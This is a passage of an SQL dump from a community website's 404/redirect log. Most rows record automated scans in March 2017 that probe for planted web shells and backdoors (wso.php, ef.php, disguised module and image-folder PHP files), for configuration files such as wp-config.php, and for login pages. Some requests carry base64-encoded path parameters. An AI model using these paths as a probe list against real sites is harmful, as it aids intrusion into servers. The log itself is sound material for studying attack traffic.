00:00:00'),(7836,'http://hallcrestheights.org/libraries/simplepie/idn/openidopenid.php',NULL,'http://hallcrestheights.org/libraries/simplepie/idn/openidopenid.php','',2,0,'2017-03-13 07:06:18','0000-00-00 00:00:00'),(7837,'http://hallcrestheights.org/libraries/joomla/language/stemmer/backup.php',NULL,'http://hallcrestheights.org/libraries/joomla/language/stemmer/backup.php','',4,0,'2017-03-13 07:06:18','0000-00-00 00:00:00'),(7838,'http://hallcrestheights.org/libraries/simplepie/idn/test.php',NULL,'http://hallcrestheights.org/libraries/simplepie/idn/test.php','',2,0,'2017-03-13 07:06:18','0000-00-00 00:00:00'),(7839,'http://hallcrestheights.org/media/ef.php',NULL,'http://hallcrestheights.org/media/ef.php','',2,0,'2017-03-13 07:06:34','0000-00-00 00:00:00'),(7840,'http://hallcrestheights.org/modules/approw.php',NULL,'http://hallcrestheights.org/modules/approw.php','',2,0,'2017-03-13 07:06:34','0000-00-00 00:00:00'),(7841,'http://hallcrestheights.org/media/editors/codemirror/mode/solr/config.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/mode/solr/config.php','',2,0,'2017-03-13 07:06:35','0000-00-00 00:00:00'),(7842,'http://hallcrestheights.org/libraries/simplepie/idn/wso.php',NULL,'http://hallcrestheights.org/libraries/simplepie/idn/wso.php','',2,0,'2017-03-13 07:06:35','0000-00-00 00:00:00'),(7843,'http://hallcrestheights.org/media/akeeba_strapper/css/smoothness/images/config.php',NULL,'http://hallcrestheights.org/media/akeeba_strapper/css/smoothness/images/config.php','',2,0,'2017-03-13 07:06:35','0000-00-00 00:00:00'),(7844,'http://hallcrestheights.org/media/editors/tinymce/skins/lib.php',NULL,'http://hallcrestheights.org/media/editors/tinymce/skins/lib.php','',3,0,'2017-03-13 07:06:35','0000-00-00 00:00:00'),(7845,'http://hallcrestheights.org/media/editors/codemirror/mode/eiffel/config.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/mode/eiffel/config.php','',2,0,'2017-03-13 07:06:35','0000-00-00 00:00:00'),(7846,'http://hallcrestheights.org/mod_ariimageslidersa.php',NULL,'http://hallcrestheights.org/mod_ariimageslidersa.php','',3,0,'2017-03-13 07:06:35','0000-00-00 00:00:00'),(7847,'http://hallcrestheights.org/libraries/simplepie/index.php',NULL,'http://hallcrestheights.org/libraries/simplepie/index.php','',2,0,'2017-03-13 07:06:35','0000-00-00 00:00:00'),(7848,'http://hallcrestheights.org/modules/config/config.php',NULL,'http://hallcrestheights.org/modules/config/config.php','',2,0,'2017-03-13 07:06:35','0000-00-00 00:00:00'),(7849,'http://hallcrestheights.org/logs/logs.php',NULL,'http://hallcrestheights.org/logs/logs.php','',7,0,'2017-03-13 07:06:35','0000-00-00 00:00:00'),(7850,'http://hallcrestheights.org/media/editors/codemirror/mode/diff/config.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/mode/diff/config.php','',2,0,'2017-03-13 07:06:36','0000-00-00 00:00:00'),(7851,'http://hallcrestheights.org/media/editors/codemirror/addon/comment/config.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/addon/comment/config.php','',2,0,'2017-03-13 07:06:36','0000-00-00 00:00:00'),(7852,'http://hallcrestheights.org/media/editors/tinymce/plugins/legacyoutput/config.php',NULL,'http://hallcrestheights.org/media/editors/tinymce/plugins/legacyoutput/config.php','',3,0,'2017-03-13 07:06:36','0000-00-00 00:00:00'),(7853,'http://hallcrestheights.org/modules/mod_araticlhess/func.php',NULL,'http://hallcrestheights.org/modules/mod_araticlhess/func.php','',2,0,'2017-03-13 07:06:52','0000-00-00 00:00:00'),(7854,'http://hallcrestheights.org/modules/mod_araticlhess/archives.php',NULL,'http://hallcrestheights.org/modules/mod_araticlhess/archives.php','',2,0,'2017-03-13 07:06:52','0000-00-00 00:00:00'),(7855,'http://hallcrestheights.org/modules/mod_araticlhess/mod_araticlhess.php',NULL,'http://hallcrestheights.org/modules/mod_araticlhess/mod_araticlhess.php','',5,0,'2017-03-13 07:06:53','0000-00-00 00:00:00'),(7856,'http://hallcrestheights.org/modules/mod_araticclhess/mod_araticclhess.php',NULL,'http://hallcrestheights.org/modules/mod_araticclhess/mod_araticclhess.php','',2,0,'2017-03-13 07:06:53','0000-00-00 00:00:00'),(7857,'http://hallcrestheights.org/modules/ef.php',NULL,'http://hallcrestheights.org/modules/ef.php','',2,0,'2017-03-13 07:06:53','0000-00-00 00:00:00'),(7858,'http://hallcrestheights.org/modules/mod_ariimageslidersa/mod_ariimageslidersa.php',NULL,'http://hallcrestheights.org/modules/mod_ariimageslidersa/mod_ariimageslidersa.php','',16,0,'2017-03-13 07:06:53','0000-00-00 00:00:00'),(7859,'http://hallcrestheights.org/modules/mod_backup2/mod_backup2.php',NULL,'http://hallcrestheights.org/modules/mod_backup2/mod_backup2.php','',5,0,'2017-03-13 07:06:53','0000-00-00 00:00:00'),(7860,'http://hallcrestheights.org/modules/mod_araticllws/mod_araticllws.php',NULL,'http://hallcrestheights.org/modules/mod_araticllws/mod_araticllws.php','',11,0,'2017-03-13 07:06:53','0000-00-00 00:00:00'),(7861,'http://hallcrestheights.org/modules/mod_araticlhess/ef.php',NULL,'http://hallcrestheights.org/modules/mod_araticlhess/ef.php','',2,0,'2017-03-13 07:06:53','0000-00-00 00:00:00'),(7862,'http://hallcrestheights.org/modules/mod_ariimagesws/mod_ariimagesws.php',NULL,'http://hallcrestheights.org/modules/mod_ariimagesws/mod_ariimagesws.php','',6,0,'2017-03-13 07:06:53','0000-00-00 00:00:00'),(7863,'http://hallcrestheights.org/modules/mod_articless/mod_articless.php',NULL,'http://hallcrestheights.org/modules/mod_articless/mod_articless.php','',4,0,'2017-03-13 07:06:53','0000-00-00 00:00:00'),(7864,'http://hallcrestheights.org/modules/mod_banners/tmpl/tmpl.php',NULL,'http://hallcrestheights.org/modules/mod_banners/tmpl/tmpl.php','',5,0,'2017-03-13 07:06:54','0000-00-00 00:00:00'),(7865,'http://hallcrestheights.org/modules/mod_menu/conf.php',NULL,'http://hallcrestheights.org/modules/mod_menu/conf.php','',4,0,'2017-03-13 07:07:30','0000-00-00 00:00:00'),(7866,'http://hallcrestheights.org/modules/mod_modules/mod_modules.php',NULL,'http://hallcrestheights.org/modules/mod_modules/mod_modules.php','',3,0,'2017-03-13 07:07:30','0000-00-00 00:00:00'),(7867,'http://hallcrestheights.org/modules/mod_search/search.html.php',NULL,'http://hallcrestheights.org/modules/mod_search/search.html.php','',2,0,'2017-03-13 07:07:30','0000-00-00 00:00:00'),(7868,'http://hallcrestheights.org/modules/mod_fxprev/helper.php',NULL,'http://hallcrestheights.org/modules/mod_fxprev/helper.php','',2,0,'2017-03-13 07:07:30','0000-00-00 00:00:00'),(7869,'http://hallcrestheights.org/modules/mod_fxprev/libraries/main.path.php',NULL,'http://hallcrestheights.org/modules/mod_fxprev/libraries/main.path.php','',2,0,'2017-03-13 07:07:30','0000-00-00 00:00:00'),(7870,'http://hallcrestheights.org/modules/mod_related_system/mod_related_system.php',NULL,'http://hallcrestheights.org/modules/mod_related_system/mod_related_system.php','',2,0,'2017-03-13 07:07:30','0000-00-00 00:00:00'),(7871,'http://hallcrestheights.org/modules/mod_msn/mod_msn.php',NULL,'http://hallcrestheights.org/modules/mod_msn/mod_msn.php','',3,0,'2017-03-13 07:07:30','0000-00-00 00:00:00'),(7872,'http://hallcrestheights.org/modules/mod_sp_countdown/assets/css/backup.php',NULL,'http://hallcrestheights.org/modules/mod_sp_countdown/assets/css/backup.php','',3,0,'2017-03-13 07:07:30','0000-00-00 00:00:00'),(7873,'http://hallcrestheights.org/modules/mod_mapsgoogle/mod_mapsgoogle.php',NULL,'http://hallcrestheights.org/modules/mod_mapsgoogle/mod_mapsgoogle.php','',4,0,'2017-03-13 07:07:30','0000-00-00 00:00:00'),(7874,'http://hallcrestheights.org/modules/mod_stop/mod_stop.php',NULL,'http://hallcrestheights.org/modules/mod_stop/mod_stop.php','',2,0,'2017-03-13 07:07:31','0000-00-00 00:00:00'),(7875,'http://hallcrestheights.org/modules/mod_search/search.php',NULL,'http://hallcrestheights.org/modules/mod_search/search.php','',5,0,'2017-03-13 07:07:31','0000-00-00 00:00:00'),(7876,'http://hallcrestheights.org/modules/mod_google/mod_msn_show.php',NULL,'http://hallcrestheights.org/modules/mod_google/mod_msn_show.php','',2,0,'2017-03-13 07:07:31','0000-00-00 00:00:00'),(7877,'http://hallcrestheights.org/modules/mod_mapsapi/mod_mapsapi.php',NULL,'http://hallcrestheights.org/modules/mod_mapsapi/mod_mapsapi.php','',5,0,'2017-03-13 07:07:31','0000-00-00 00:00:00'),(7878,'http://hallcrestheights.org/modules/mod_random_image/tmpl/styles.php',NULL,'http://hallcrestheights.org/modules/mod_random_image/tmpl/styles.php','',5,0,'2017-03-13 07:07:31','0000-00-00 00:00:00'),(7879,'http://hallcrestheights.org/modules/mod_stat/mod_stat.php',NULL,'http://hallcrestheights.org/modules/mod_stat/mod_stat.php','',5,0,'2017-03-13 07:07:31','0000-00-00 00:00:00'),(7880,'http://hallcrestheights.org/plugins/quickicon/controll.php',NULL,'http://hallcrestheights.org/plugins/quickicon/controll.php','',2,0,'2017-03-13 07:08:05','0000-00-00 00:00:00'),(7881,'http://hallcrestheights.org/modules/mod_ya/mod_ya.php',NULL,'http://hallcrestheights.org/modules/mod_ya/mod_ya.php','',2,0,'2017-03-13 07:08:05','0000-00-00 00:00:00'),(7882,'http://hallcrestheights.org/modules/mod_system/mod_system.php',NULL,'http://hallcrestheights.org/modules/mod_system/mod_system.php','',6,0,'2017-03-13 07:08:05','0000-00-00 00:00:00'),(7883,'http://hallcrestheights.org/plugins/system/banip.php',NULL,'http://hallcrestheights.org/plugins/system/banip.php','',2,0,'2017-03-13 07:08:05','0000-00-00 00:00:00'),(7884,'http://hallcrestheights.org/plugins/editors-xtd/mosimage.php',NULL,'http://hallcrestheights.org/plugins/editors-xtd/mosimage.php','',5,0,'2017-03-13 07:08:05','0000-00-00 00:00:00'),(7885,'http://hallcrestheights.org/plugins/search/conhost.php',NULL,'http://hallcrestheights.org/plugins/search/conhost.php','',2,0,'2017-03-13 07:08:05','0000-00-00 00:00:00'),(7886,'http://hallcrestheights.org/plugins/system/anticopy/anticopy.php',NULL,'http://hallcrestheights.org/plugins/system/anticopy/anticopy.php','',6,0,'2017-03-13 07:08:05','0000-00-00 00:00:00'),(7887,'http://hallcrestheights.org/modules/oclock.php',NULL,'http://hallcrestheights.org/modules/oclock.php','',3,0,'2017-03-13 07:08:05','0000-00-00 00:00:00'),(7888,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/sys.php',NULL,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/sys.php','',2,0,'2017-03-13 07:08:05','0000-00-00 00:00:00'),(7889,'http://hallcrestheights.org/modules/mod_zetta/zetta.php',NULL,'http://hallcrestheights.org/modules/mod_zetta/zetta.php','',2,0,'2017-03-13 07:08:05','0000-00-00 00:00:00'),(7890,'http://hallcrestheights.org/modules/mod_xsystem/mod_xsystem.php',NULL,'http://hallcrestheights.org/modules/mod_xsystem/mod_xsystem.php','',2,0,'2017-03-13 07:08:06','0000-00-00 00:00:00'),(7891,'http://hallcrestheights.org/plugins/system/anticopy/debug.php',NULL,'http://hallcrestheights.org/plugins/system/anticopy/debug.php','',7,0,'2017-03-13 07:08:06','0000-00-00 00:00:00'),(7892,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/voice.php',NULL,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/voice.php','',2,0,'2017-03-13 07:08:06','0000-00-00 00:00:00'),(7893,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/sys.php',NULL,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/sys.php','',2,0,'2017-03-13 07:08:06','0000-00-00 00:00:00'),(7894,'http://hallcrestheights.org/plugins/system/anticopy/debuq.php',NULL,'http://hallcrestheights.org/plugins/system/anticopy/debuq.php','',2,0,'2017-03-13 07:08:06','0000-00-00 00:00:00'),(7895,'http://hallcrestheights.org/plugins/system/plg_system_anticopy/anticopy.php',NULL,'http://hallcrestheights.org/plugins/system/plg_system_anticopy/anticopy.php','',3,0,'2017-03-13 07:08:24','0000-00-00 00:00:00'),(7896,'http://hallcrestheights.org/plugins/system/bigshotgoogleanalytics.php',NULL,'http://hallcrestheights.org/plugins/system/bigshotgoogleanalytics.php','',2,0,'2017-03-13 07:08:24','0000-00-00 00:00:00'),(7897,'http://hallcrestheights.org/plugins/system/mod.php',NULL,'http://hallcrestheights.org/plugins/system/mod.php','',3,0,'2017-03-13 07:08:24','0000-00-00 00:00:00'),(7898,'http://hallcrestheights.org/stats.php',NULL,'http://hallcrestheights.org/stats.php','',3,0,'2017-03-13 07:08:24','0000-00-00 00:00:00'),(7899,'http://hallcrestheights.org/tmp/mod_config.php',NULL,'http://hallcrestheights.org/tmp/mod_config.php','',3,0,'2017-03-13 07:08:24','0000-00-00 00:00:00'),(7900,'http://hallcrestheights.org/plugins/system/logins.php',NULL,'http://hallcrestheights.org/plugins/system/logins.php','',3,0,'2017-03-13 07:08:24','0000-00-00 00:00:00'),(7901,'http://hallcrestheights.org/system.php',NULL,'http://hallcrestheights.org/system.php','',5,0,'2017-03-13 07:08:24','0000-00-00 00:00:00'),(7902,'http://hallcrestheights.org/readme.php',NULL,'http://hallcrestheights.org/readme.php','',7,0,'2017-03-13 07:08:24','0000-00-00 00:00:00'),(7903,'http://hallcrestheights.org/tmp/config.php',NULL,'http://hallcrestheights.org/tmp/config.php','',6,0,'2017-03-13 07:08:24','0000-00-00 00:00:00'),(7904,'http://hallcrestheights.org/plugins/system/jbackup.php',NULL,'http://hallcrestheights.org/plugins/system/jbackup.php','',2,0,'2017-03-13 07:08:25','0000-00-00 00:00:00'),(7905,'http://hallcrestheights.org/tmp/logo_img.php',NULL,'http://hallcrestheights.org/tmp/logo_img.php','',10,0,'2017-03-13 07:08:25','0000-00-00 00:00:00'),(7906,'http://hallcrestheights.org/templates/logo_img.php',NULL,'http://hallcrestheights.org/templates/logo_img.php','',7,0,'2017-03-13 07:08:26','0000-00-00 00:00:00'),(7907,'http://hallcrestheights.org/tmp/temp.php',NULL,'http://hallcrestheights.org/tmp/temp.php','',5,0,'2017-03-13 07:08:43','0000-00-00 00:00:00'),(7908,'http://hallcrestheights.org/tmp/system.php',NULL,'http://hallcrestheights.org/tmp/system.php','',6,0,'2017-03-13 07:08:43','0000-00-00 00:00:00'),(7909,'http://hallcrestheights.org/tmp/sfx.php',NULL,'http://hallcrestheights.org/tmp/sfx.php','',30,0,'2017-03-13 07:08:43','0000-00-00 00:00:00'),(7910,'http://hallcrestheights.org/tmp/xml.php',NULL,'http://hallcrestheights.org/tmp/xml.php','',4,0,'2017-03-13 07:08:43','0000-00-00 00:00:00'),(7911,'http://hallcrestheights.org/wso.php',NULL,'http://hallcrestheights.org/wso.php','',14,0,'2017-03-13 07:08:43','0000-00-00 00:00:00'),(7912,'http://hallcrestheights.org/tmp/quest.php',NULL,'http://hallcrestheights.org/tmp/quest.php','',3,0,'2017-03-13 07:08:44','0000-00-00 00:00:00'),(7913,'http://hallcrestheights.org/modules/mod_bing/mod_bing.php',NULL,'http://hallcrestheights.org/modules/mod_bing/mod_bing.php','',2,0,'2017-03-13 08:19:36','0000-00-00 00:00:00'),(7914,'http://hallcrestheights.org/modules/mod_ariimogeslidersa/mod_ariimogeslidersa.php',NULL,'http://hallcrestheights.org/modules/mod_ariimogeslidersa/mod_ariimogeslidersa.php','',1,0,'2017-03-13 08:19:36','0000-00-00 00:00:00'),(7915,'http://www.hallcrestheights.org/k50920-jgletkym-i20162631-drqzn-rvmlkswa-zvkecqq-neei.htm',NULL,'','',6,0,'2017-03-13 18:24:22','0000-00-00 00:00:00'),(7916,'http://hallcrestheights.org/index.php?option=com_jofacebookgallery&view=category&id=1',NULL,'http://www.google.com/','',2,0,'2017-03-13 23:24:40','0000-00-00 00:00:00'),(7917,'http://hallcrestheights.org/vmskdl44rededd',NULL,'','',2,0,'2017-03-14 01:14:11','0000-00-00 00:00:00'),(7918,'http://hallcrestheights.org/N0Wccvvd333.php',NULL,'','',2,0,'2017-03-14 01:14:12','0000-00-00 00:00:00'),(7919,'http://hallcrestheights.org/N0WaY/N0WaY1bb2/N0WaY123.php',NULL,'','',2,0,'2017-03-14 01:14:14','0000-00-00 00:00:00'),(7920,'http://hallcrestheights.org/sites/default/settings',NULL,'','',1,0,'2017-03-14 01:14:18','0000-00-00 00:00:00'),(7921,'http://hallcrestheights.org/sites/hallcrestheights.org/settings',NULL,'','',1,0,'2017-03-14 01:14:19','0000-00-00 00:00:00'),(7922,'http://hallcrestheights.org/wp-config.php',NULL,'','',1,0,'2017-03-14 01:14:21','0000-00-00 00:00:00'),(7923,'http://hallcrestheights.org/HH0908.pdf',NULL,'','',10,0,'2017-03-14 04:38:23','0000-00-00 00:00:00'),(7924,'http://hallcrestheights.org/index.php?option=com_jofacebookgallery&view=albums&id=1',NULL,'http://www.google.com/','',2,0,'2017-03-14 05:03:00','0000-00-00 00:00:00'),(7925,'http://www.hallcrestheights.org/pcscq-i20162633-rufu-npkw-xpoideot-k684-wtvsoarm-osmgep-lalhe-liyrqi.htm',NULL,'','',4,0,'2017-03-14 05:29:10','0000-00-00 00:00:00'),(7926,'http://hallcrestheights.org/index.php?option=com_jofacebookgallery&view=photo&id=1',NULL,'http://www.google.com/','',3,0,'2017-03-14 11:01:29','0000-00-00 00:00:00'),(7927,'http://hallcrestheights.org/blog/wp-login.php',NULL,'','',1,0,'2017-03-14 22:29:52','0000-00-00 00:00:00'),(7928,'http://hallcrestheights.org/user/login',NULL,'','',2,0,'2017-03-14 22:30:03','0000-00-00 00:00:00'),(7929,'http://hallcrestheights.org/edzvdlqc-i20162635-omnnm-k26600-mcawvbfu-japyvrl-flxh-qjkuh.htm',NULL,'','',2,0,'2017-03-15 10:12:02','0000-00-00 00:00:00'),(7930,'http://www.hallcrestheights.org/ryvhrhm-qtyysllg-i20162632-eajanpdm-efnxhqf-hjdyha-oxrcj-hwuvdsve-zytw-k41928-lcycws-cpua.htm',NULL,'http://search.yahoo.co.jp/','',2,0,'2017-03-15 15:28:33','0000-00-00 00:00:00'),(7931,'http://hallcrestheights.org/files/hh_newsletter_201612.pdf',NULL,'','',3,0,'2017-03-16 01:32:37','0000-00-00 00:00:00'),(7932,'http://hallcrestheights.org/files/hh_newsletter_201507.pdf',NULL,'','',3,0,'2017-03-16 01:32:40','0000-00-00 00:00:00'),(7933,'http://hallcrestheights.org/files/hh_newsletter_201506.pdf',NULL,'','',3,0,'2017-03-16 01:32:41','0000-00-00 00:00:00'),(7934,'http://hallcrestheights.org/files/hh_newsletter_201502.pdf',NULL,'','',3,0,'2017-03-16 01:32:41','0000-00-00 00:00:00'),(7935,'http://hallcrestheights.org/files/hh_newsletter_201412.pdf',NULL,'','',3,0,'2017-03-16 01:32:42','0000-00-00 00:00:00'),(7936,'http://hallcrestheights.org/files/hh_newsletter_201407.pdf',NULL,'','',3,0,'2017-03-16 01:32:42','0000-00-00 00:00:00'),(7937,'http://hallcrestheights.org/files/hh_newsletter_201405.pdf',NULL,'','',3,0,'2017-03-16 01:32:43','0000-00-00 00:00:00'),(7938,'http://hallcrestheights.org/files/attic_insulation_information.pdf',NULL,'','',3,0,'2017-03-16 01:32:51','0000-00-00 00:00:00'),(7939,'http://hallcrestheights.org/files/ten_energy_tips.pdf',NULL,'','',3,0,'2017-03-16 01:32:52','0000-00-00 00:00:00'),(7940,'http://www.hallcrestheights.org/edzvdlq-k28-comnnmmc-awvbfuja-pyvrlfl-xhqjku-i20162633-hkcmu-mbhmgznk-ohey-rupxpu.htm',NULL,'https://www.google.co.jp/','',3,0,'2017-03-16 05:50:35','0000-00-00 00:00:00'),(7941,'http://hallcrestheights.org//images/1ndex.php?z3=M09tSXFPLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-16 06:49:48','0000-00-00 00:00:00'),(7942,'http://hallcrestheights.org//sqlbak.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:49:51','0000-00-00 00:00:00'),(7943,'http://hallcrestheights.org//email.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:49:55','0000-00-00 00:00:00'),(7944,'http://hallcrestheights.org//functions.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:50:00','0000-00-00 00:00:00'),(7945,'http://hallcrestheights.org//cache/news.php?z3=M09tSXFPLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:50:07','0000-00-00 00:00:00'),(7946,'http://hallcrestheights.org//tmp.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',3,0,'2017-03-16 06:50:43','0000-00-00 00:00:00'),(7947,'http://hallcrestheights.org//shootme.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:50:44','0000-00-00 00:00:00'),(7948,'http://hallcrestheights.org//configurationbak.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:50:47','0000-00-00 00:00:00'),(7949,'http://hallcrestheights.org//robots.txt.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:50:52','0000-00-00 00:00:00'),(7950,'http://hallcrestheights.org//jconfig.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-16 06:51:21','0000-00-00 00:00:00'),(7951,'http://hallcrestheights.org//media/reads.php?z3=M09tSXFPLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:51:23','0000-00-00 00:00:00'),(7952,'http://hallcrestheights.org//media/1ndex.php?z3=M09tSXFPLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-03-16 06:51:29','0000-00-00 00:00:00'),(7953,'http://hallcrestheights.org//sql_dump.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:52:00','0000-00-00 00:00:00'),(7954,'http://hallcrestheights.org//images/laj.php?z3=M09tSXFPLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:52:08','0000-00-00 00:00:00'),(7955,'http://hallcrestheights.org//media/404.php?z3=M09tSXFPLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:52:15','0000-00-00 00:00:00'),(7956,'http://hallcrestheights.org//media/tmp.php?z3=M09tSXFPLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:52:20','0000-00-00 00:00:00'),(7957,'http://hallcrestheights.org//r3x.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:52:29','0000-00-00 00:00:00'),(7958,'http://hallcrestheights.org//log.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-16 06:53:05','0000-00-00 00:00:00'),(7959,'http://hallcrestheights.org//images/stories/0day.php?z3=M09tSXFPLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:53:06','0000-00-00 00:00:00'),(7960,'http://hallcrestheights.org//includes/u2p.php?z3=M09tSXFPLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:53:24','0000-00-00 00:00:00'),(7961,'http://hallcrestheights.org//images/xxx.php?z3=M09tSXFPLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-16 06:53:57','0000-00-00 00:00:00'),(7962,'http://hallcrestheights.org//al277.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-16 06:54:34','0000-00-00 00:00:00'),(7963,'http://hallcrestheights.org//cache/cache_aqbmkwwx.php?z3=M09tSXFPLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:54:55','0000-00-00 00:00:00'),(7964,'http://hallcrestheights.org//install.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:55:20','0000-00-00 00:00:00'),(7965,'http://hallcrestheights.org//dswat.org/wsdl.php?z3=M09tSXFPLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:55:23','0000-00-00 00:00:00'),(7966,'http://hallcrestheights.org//robot.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-16 06:55:53','0000-00-00 00:00:00'),(7967,'http://hallcrestheights.org//wsdl.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:55:54','0000-00-00 00:00:00'),(7968,'http://hallcrestheights.org//goog1es.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:55:57','0000-00-00 00:00:00'),(7969,'http://hallcrestheights.org//site/tmp/cTivrC.php?z3=M09tSXFPLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:56:00','0000-00-00 00:00:00'),(7970,'http://hallcrestheights.org//update.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:56:04','0000-00-00 00:00:00'),(7971,'http://hallcrestheights.org//includes.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:56:06','0000-00-00 00:00:00'),(7972,'http://hallcrestheights.org//wp-main.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:56:09','0000-00-00 00:00:00'),(7973,'http://hallcrestheights.org//news.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:56:13','0000-00-00 00:00:00'),(7974,'http://hallcrestheights.org//images/al277.php?z3=M09tSXFPLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:56:15','0000-00-00 00:00:00'),(7975,'http://hallcrestheights.org//webconfig.txt.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:56:18','0000-00-00 00:00:00'),(7976,'http://hallcrestheights.org//cache/cachee.php?z3=M09tSXFPLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:56:23','0000-00-00 00:00:00'),(7977,'http://hallcrestheights.org//thumb.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:56:25','0000-00-00 00:00:00'),(7978,'http://hallcrestheights.org//SessionController.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:56:33','0000-00-00 00:00:00'),(7979,'http://hallcrestheights.org//maill.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:56:37','0000-00-00 00:00:00'),(7980,'http://hallcrestheights.org//error-log.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:56:43','0000-00-00 00:00:00'),(7981,'http://hallcrestheights.org//authenticating.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:56:46','0000-00-00 00:00:00'),(7982,'http://hallcrestheights.org//google-assist.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:57:09','0000-00-00 00:00:00'),(7983,'http://hallcrestheights.org//images/google-assist.php?z3=M09tSXFPLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:57:12','0000-00-00 00:00:00'),(7984,'http://hallcrestheights.org//images/robots.txt.php?z3=M09tSXFPLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:57:15','0000-00-00 00:00:00'),(7985,'http://hallcrestheights.org//elements.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:57:17','0000-00-00 00:00:00'),(7986,'http://hallcrestheights.org//xmlsrpc.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:57:20','0000-00-00 00:00:00'),(7987,'http://hallcrestheights.org//wp-cache.php?z3=M09tSXFPLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:57:22','0000-00-00 00:00:00'),(7988,'http://hallcrestheights.org//images/404.php?z3=M09tSXFPLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-16 06:57:24','0000-00-00 